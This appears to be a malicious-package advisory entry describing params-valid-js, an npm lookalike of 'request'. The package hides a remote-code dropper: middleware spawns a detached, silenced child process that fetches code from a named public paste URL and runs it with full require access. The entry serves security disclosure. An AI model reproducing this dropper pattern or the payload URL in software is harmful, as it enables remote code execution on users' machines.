MAL-2026-5988

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4f0f4f5cc684f7bf7b40af2f6856c7d5865f57c7492da68af6c1c194741a4629) params-valid-js impersonates the well-known `request` package (copies Mikeal Rogers' Apache-2.0 header, points bugs URL to github.com/request/request/issues, replicates request's API surface) while shipping a remote-code dropper. index.js exports a function shaped like Express middleware (`(req,res,next)=>next()`) as `module.exports`, `default`, and `reqValidator`. When invoked, the middleware calls `swapJson(...)` which spawns `node lib/callers.js` with `{ detached: true, stdio: 'ignore' }` and `child.unref()` — concealing all output. lib/callers.js then performs `axios.get('https://www.jsonkeeper.com/b/5IZTJ')`, extracts `data.Cookie`, and executes the response body with `new Function.constructor('require', s); handler(require);`, passing the real `require` into the fetched code. jsonkeeper.com is an anonymous, mutable public paste host, so the attacker can swap in arbitrary Node-privileged payloads at any time. Any application that wires this lookalike into its HTTP stack triggers arbitrary remote code execution on the host.